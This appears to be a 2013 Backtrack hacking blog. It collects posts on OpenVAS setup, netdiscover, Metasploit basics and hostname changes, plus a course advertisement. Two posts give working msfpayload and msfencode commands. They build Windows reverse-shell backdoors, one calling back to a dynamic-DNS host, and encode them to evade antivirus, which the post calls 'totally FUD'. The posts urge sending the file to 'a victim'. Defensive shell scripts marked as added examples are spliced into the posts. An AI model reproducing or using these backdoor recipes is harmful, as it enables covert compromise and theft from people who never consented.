latest articles

Thursday, February 14, 2013

How to configure OpenVAS



OpenVAS is the most advanced open source vulnerability scanner and manager tool. It already comes pre-installed in Backtrack 5. Today I will show you how to configure this wonderful tool.


Here is the location of OpenVAS:








Setting up OpenVAS


1- Adding a user:

Just follow the graphical menu as shown above and click on "adduser" and follow the instructions.







Easy configuration as you see :-)

2- Making the certificate: From the same menu click on "OpenVAS mkcert" and follow the instructions.






3- Syncing the NVTs: In this step we update the OpenVAS feed of NVTs (Network Vulnerability Tests) to get the latest tests and plugins used to identify vulnerabilities. If you want to stay up to date, do this regularly.
So select "OpenVAS NVT Sync" from the menu:







4- Starting the scanner: Again, from the same graphical menu, click on "start OpenVAS scanner"






5- Setup OpenVAS manager: Here we need to generate a client certificate for the OpenVAS manager by running the following command:


root@shinobi:~# openvas-mkcert-client -n om -i











Now we need to rebuild the database, and you should do this each time you update the NVTs. This is done with a simple command:


root@shinobi:~# openvasmd --rebuild



6- Setup OpenVAS Administrator:


We need to create an administrative user that we will be using to perform all of our vulnerability assessments. This is done by running the following command:


root@shinobi:~# openvasad -c 'add_user' -n openvasadmin -r Admin








Note that you can replace "openvasadmin" by any other username of your choice.







Now we need to start the OpenVAS Administrator.
This also runs as a daemon in the background. As I am running everything from my local machine, I will have it listen on localhost, in this case on the default port. This is done by running the following command.

root@shinobi:~# openvasad -a 127.0.0.1 -p 9393

Starting Greenbone Security Assistant:


Now we need to start the Greenbone Security Assistant.
This again runs as a daemon in the background. As I am running everything from my local machine, I will have it listen on localhost, in this case on the default port. This is done by running the following command.

root@shinobi:~# gsad --http-only --listen=127.0.0.1 -p 9392


At this point your installation is essentially complete, but as we have got this far we may as well continue to make sure everything is working as expected.
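The two daemons above are deliberately bound to 127.0.0.1, so the administrator and the web interface are not reachable from the network. The script below is an added example (not from the original post or from the OpenVAS project) that checks exactly that: it parses a netstat-style listener table and reports any of the two ports used in this post (9392 for gsad, 9393 for openvasad) that is bound to an address other than loopback. The table in SAMPLE_TABLE is constructed so the script runs offline; on a live box you would feed it the real output of `netstat -lnt`.

```shell
#!/bin/sh
# check_openvas_listeners.sh (added example): confirm gsad (9392) and openvasad
# (9393) listen on loopback only, as the post intends.
# SAMPLE_TABLE is a constructed `netstat -lnt`-style listing; 9392 is shown
# bound to 0.0.0.0, which is what happens when --listen=127.0.0.1 is omitted.
# On a real system use: TABLE="$(netstat -lnt)"
SAMPLE_TABLE='Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:9392            0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:9393          0.0.0.0:*               LISTEN'

# exposed_ports TABLE PORT...: print each PORT whose listener is bound to an
# address other than 127.0.0.1 (reachable from the network). Prints nothing
# when every requested port is loopback-only or not listening at all.
exposed_ports() {
  table="$1"; shift
  for port in "$@"; do
    printf '%s\n' "$table" | awk -v p="$port" '
      # column 4 is "ADDR:PORT"; match the exact port, then inspect the address
      $4 ~ (":" p "$") { split($4, a, ":"); if (a[1] != "127.0.0.1") print p }'
  done
}

# openvas_bind_ok TABLE: succeed (exit 0) only when neither 9392 nor 9393
# is exposed to the network.
openvas_bind_ok() {
  [ -z "$(exposed_ports "$1" 9392 9393)" ]
}

# When run directly, report which of the two ports are exposed in the sample.
if ! openvas_bind_ok "$SAMPLE_TABLE"; then
  echo "exposed OpenVAS ports: $(exposed_ports "$SAMPLE_TABLE" 9392 9393 | tr '\n' ' ')"
fi
```

With the constructed table the script prints `exposed OpenVAS ports: 9392`, because the sample shows gsad bound to all interfaces. Against real `netstat -lnt` output a silent run means both daemons are loopback-only; if you later decide to expose the web interface on purpose, drop `--http-only` too, since it would otherwise serve the login page over plain HTTP.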

Now we need to start an application that lets you communicate with the scanner and the other daemons.
The first of these choices is Greenbone Security Desktop.
Start it from the menu item, fill in the credentials and details we created earlier, then click the login button.









Vulnerability assessment





Vulnerability assessment is the second phase of penetration testing. After you have gained the initial information and a general layout of your target during the information gathering phase, you can now scan the target for possible vulnerabilities to exploit later. The aim of this important step is simply to find potential security holes that would allow a user to gain unauthorized access to a given system. Backtrack 5 comes with vulnerability scanner tools, which I am going to cover in detail in future articles, but there are also online tools that you can use.
In Backtrack the Vulnerability Assessment category is subdivided into:

1- Vulnerability scanners: the most famous ones are OpenVAS and Nessus. You also have Lynis and Mantra.

2- Network Assessment: it includes Cisco tools, network fuzzers, Open Source Assessment and VoIP fuzzers.

3- Web Application Assessment

4- Database Assessment





vulnerability assessment in action


Vulnerability analysis is a passive process in which you use tools or utilities, sometimes software that analyzes network traffic and systems, to identify any security flaws or misconfigurations that increase exposure to attacks. You can consider it an advanced stage of information gathering or footprinting.
The active phase of penetration testing is exploitation.
Assessment can be used on both sides, defensive or offensive. It can be used to discover security weaknesses in order to find the adequate solutions to fix them, which is what a penetration tester is expected to do; or it can be used with malicious intentions to exploit the available vulnerabilities and gain unauthorized access to a system.


Sunday, February 10, 2013

FUD backdoor with msfencode

msfpayload windows/shell_reverse_tcp LHOST=firlezza.no-ip.biz LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 5





In the previous article, we saw how to create a simple backdoor.exe for exploiting Windows machines (simple backdoor). However, that simple backdoor is easily caught by any antivirus program; you can't rely on a careless victim who is not running an antivirus program on his machine, because you know that is very rare.
Well, Metasploit has the necessary tools for encoding your backdoor to avoid detection. Let's first see our chances of bypassing an antivirus program without encoding:







Here is another scan:








As you can see, we have only a small chance of a successful exploitation of a remote victim.


Let's see what options Metasploit offers us:



root@shinobi:~# msfencode -h








Let's see what encoders we have available:

root@shinobi:~# msfencode -l







As you may notice, "shikata_ga_nai" is rated as the best encoder in "msfencode", so we are going to use it to encode our backdoor.

Let's create our backdoor:

root@shinobi:~# msfpayload windows/meterpreter_reverse_tcp LHOST=192.168.1.101 LPORT=443 R | msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 5 -x /root/Desktop/pw.exe -o /root/Desktop/pwn.exe






With the above command, we encoded our backdoor 5 times with the "shikata_ga_nai" encoder and excluded the bytes \x00, \x0a and \x0d from the encoded output, then we exported the generated exe file to our desktop. Let's now check our chances of fooling a given victim with online virus scanners.













As you can see, the backdoor is totally FUD (fully undetectable)!

Saturday, February 9, 2013

Creating a simple exe backdoor





In this scenario, we are going to create a simple backdoor, an infected executable file to be run on a Windows system. You need to provide your IP address, which can be obtained with the command "ifconfig", together with the port you want your backdoor to connect to. The port usually used for this connection is 443 or 4444, but you can choose any other port.


Issue the following command:



root@shinobi:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.15 LPORT=4444 X > backdoor.exe







So, as you can see from this example, a backdoor.exe has been created in the "Home" folder. In the above example just change the IP address to yours, and name the file whatever you like; after all, you don't want to tell your victim that this is a backdoor! :-)


Now we are done with the first part, but what is next?
We simply need a listener that will handle the connection back to our attacking machine.

First of all, we need to open metasploit console:


root@shinobi:~# msfconsole









Now we need to use the multi/handler module for the reverse connection:

msf >  use exploit/multi/handler







Now we set our payload:

msf >  set payload windows/meterpreter/reverse_tcp







Now we have to set the lhost and lport:

msf >  set lhost 192.168.1.15

msf >  set lport 4444





The last step is to type "exploit":


msf > exploit






We are ready for exploiting the remote machine. Send the backdoor to a victim and wait for a connection ;-)



How to change your hostname





After we have seen how to customize your terminal background, here is another tutorial, this time for customizing your hostname. In this example I am going to change the Backtrack default hostname to my cyber name.



To display your current hostname type this command:

root@bt:~# hostname








Now, to change the default hostname, type the following:


root@bt:~# hostname shinobi











Let's see if it worked; we need to close the terminal and open a new one:








However, if you reboot the system, this change will be lost. To fix that and make your new hostname permanent, we need to edit the "hostname" file in "/etc":


root@bt:~# pico /etc/hostname














All that is left now is to replace the default hostname with the one you have just chosen, then press Ctrl+O and "Enter" to save the changes, then Ctrl+X to exit.
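The two manual steps above (the runtime `hostname` command and the edit of /etc/hostname) can be wrapped in a small script. The one below is an added example, not from the original post; the function names persist_hostname and apply_hostname are my own. It adds the check a practitioner wants before writing the file: the name must be a single valid host label (letters, digits and hyphens, 1 to 63 characters, no leading or trailing hyphen), because a bad value in /etc/hostname produces confusing errors from sudo and other tools at the next boot.

```shell
#!/bin/sh
# Added example: validate a hostname, then persist and apply it.

# persist_hostname NAME FILE: write NAME to FILE (/etc/hostname on a real box)
# only if NAME is a valid single host label per RFC 1123. Returns 1 and leaves
# FILE untouched otherwise. FILE is a parameter so the function can be tried
# on a temporary file without root.
persist_hostname() {
  name="$1"; file="$2"
  # 1-63 chars, alphanumerics and hyphens, must start and end with alphanumeric
  printf '%s' "$name" | grep -Eq '^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?$' || return 1
  printf '%s\n' "$name" > "$file"
}

# apply_hostname NAME: the two steps the post does by hand, persistent file
# first, then the running kernel hostname. Needs root; not called below so the
# file can be sourced or tested unprivileged.
apply_hostname() {
  persist_hostname "$1" /etc/hostname || { echo "invalid hostname: $1" >&2; return 1; }
  hostname "$1"
}

# Usage (as root):  apply_hostname shinobi
```

On an Ubuntu-based system such as Backtrack 5, /etc/hosts also carries a `127.0.1.1 <oldname>` line; update it to the new name as well, or sudo will complain that it cannot resolve the host.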


Hope you like it :-)





Tuesday, February 5, 2013

The best penetration courses ever created !!!




"NINJA SECURITY is a leading provider of IT security and penetration testing courses for IT professionals. NINJA SECURITY mission is to advance the career of IT security professionals by providing affordable and comprehensive education. All NINJA SECURITY courses utilize engaging eLearning and the most effective mix of theory, practice and methodology in IT security all with real-world lessons that students can immediately apply to build relevant skills and keep their organization's data and systems safe". ninja security

The NINJA SECURITY team has just updated the website together with cutting-edge new techniques and revolutionary courses. I dare say on my own responsibility that the provided courses are far ahead of their rivals. If you have ever opted for other pentesting courses you must have already noticed that they are riddles more than really useful courses, and they are always hiding things from learners just to keep them for themselves. With Ninja Security courses, you will have a big relief from the start. The courses are not electic; they teach you everything from scratch, explain missing theory and give you the opportunity to test every acquired skill, and never let you down before making sure that you mastered your training before going further. You will also get all updates for free, both slides and HD videos.
The team is led by ANTITRUST, a geek pentester with over 10 years of experience in whitebox and blackbox penetration testing, and vulnerability research.

The courses include: Metasploit to the MAX, Penetration Testing and Software Exploitation (windows & Linux).

The Ninja Security Team is interested in programming, malware analysis, ethical hacking, and penetration testing. If you are interested in joining the Ninja Security team do not hesitate to contact: contact








Saturday, February 2, 2013

Netdiscover




"Netdiscover" is an active/passive address reconnaissance tool, mainly developed for those wireless networks without dhcp server, when you are wardriving. It can be also used on hub/switched networks.

Built on top of libnet and libpcap, it can passively detect online hosts, or search for them, by actively sending arp requests, it can also be used to inspect your network arp traffic, or find network addresses using auto scan mode, which will scan for common local networks." source: netdiscover

Here are the different available options of this tool:








In this example, I am going to use "netdiscover" to search for available hosts on my wireless interface:








You can specify the interface of your choice; if you are connected by cable, for example, your network interface should be eth0. To see which network interfaces you have available, open a terminal and type: ifconfig
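Netdiscover's active mode works by sending ARP "who-has" requests for every address in the range, which is exactly what makes it visible to anyone watching the segment. As an added example (not from the post or from the netdiscover project), the script below detects that pattern from a tcpdump-style ARP capture: it counts, per requesting host, how many distinct targets it asked about and reports hosts above a threshold. The capture in SAMPLE_CAPTURE is constructed; a real one comes from `tcpdump -n -i wlan0 arp`.

```shell
#!/bin/sh
# Added example: flag hosts that ARP-scan a segment, as netdiscover's active
# mode does. Input is text in tcpdump's ARP output format.

# Constructed sample: 192.168.1.50 sweeps six neighbours (one asked twice),
# 192.168.1.7 asks only for its gateway, which is normal behaviour.
SAMPLE_CAPTURE='12:00:01.000100 ARP, Request who-has 192.168.1.1 tell 192.168.1.50, length 28
12:00:01.000200 ARP, Request who-has 192.168.1.2 tell 192.168.1.50, length 28
12:00:01.000300 ARP, Request who-has 192.168.1.3 tell 192.168.1.50, length 28
12:00:01.000400 ARP, Request who-has 192.168.1.4 tell 192.168.1.50, length 28
12:00:01.000500 ARP, Request who-has 192.168.1.5 tell 192.168.1.50, length 28
12:00:01.000600 ARP, Request who-has 192.168.1.6 tell 192.168.1.50, length 28
12:00:01.000700 ARP, Request who-has 192.168.1.6 tell 192.168.1.50, length 28
12:00:02.000000 ARP, Request who-has 192.168.1.1 tell 192.168.1.7, length 28
12:00:02.000100 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:55, length 28'

# arp_scanners CAPTURE THRESHOLD: print "SOURCE COUNT" (sorted) for every
# source that requested at least THRESHOLD distinct target addresses.
# Repeated requests for the same target are counted once.
arp_scanners() {
  printf '%s\n' "$1" | awk -v t="$2" '
    /ARP, Request who-has/ {
      src = ""; dst = ""
      for (i = 1; i <= NF; i++) {
        if ($i == "who-has") dst = $(i + 1)   # address being asked about
        if ($i == "tell")    src = $(i + 1)   # the requester
      }
      sub(/,$/, "", src)                      # "tell X," carries a trailing comma
      key = src SUBSEP dst
      if (src != "" && !(key in seen)) { seen[key] = 1; n[src]++ }
    }
    END { for (s in n) if (n[s] >= t) print s, n[s] }' | sort
}

# Usage: report sweeps of five or more distinct targets in the sample
arp_scanners "$SAMPLE_CAPTURE" 5
```

The threshold depends on the segment: a normal host resolves its gateway and a handful of peers, so a source asking for dozens of addresses in a few seconds stands out. Running the same logic over a longer capture with a time window per source would catch slower sweeps as well.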






Introduction to METASPLOIT





What is metasploit?



Metasploit, as described by its developers, is: "A collaboration between the open source community and Rapid7, Metasploit software helps security and IT professionals identify security issues, verify vulnerability mitigations, and manage expert-driven security assessments, providing true security risk intelligence. Capabilities include smart exploitation, password auditing, web application scanning, and social engineering. Teams can collaborate in Metasploit and present their findings in consolidated reports.

Metasploit editions range from a free edition to professional enterprise editions, all based on the Metasploit Framework, an open source software development kit with the world's largest, public collection of quality-assured exploits." http://www.metasploit.com/about/what-is-it/

There are several Metasploit editions: Metasploit Community, Metasploit Express, Metasploit Pro and the Metasploit Framework. There are also different interfaces for this tool: msfconsole:







msfcli:








and msfgui, which is the graphical interface:













You should also know that there is no perfect interface for Metasploit; each one has its pros and cons.

Architecture:




image credit to: HD Moore



Terminology:



1. Exploits: code that takes advantage of a security flaw to let a pentester attack a target.
2. Payloads: the code that runs on the target after exploitation; Metasploit lets you generate them as shellcode or executable files, and simply specify what the payload should do.
3. Auxiliaries: integrated helper modules such as sniffers, scanners and keyloggers.
4. Meterpreter: a payload injected into a system process on the target.
5. Encoders: used to modify the original exploit code so that it evades antivirus detection software.


Basic commands:

1. Help: Displays all the metasploit commands:










2. search: use it if you are not sure about the exact name of a certain exploit. If you want to look for an "smb" exploit, for example, you type: search smb




3. use: Used to select a particular exploit:




4. info: Used to provide information about the selected exploit:







5. show options: Used to show all options of a given exploit:




6. show: used to display all the available payloads, encoders, and nops related to a given exploit:





7. set: Used to configure a given exploit:










I hope that this article was useful to you.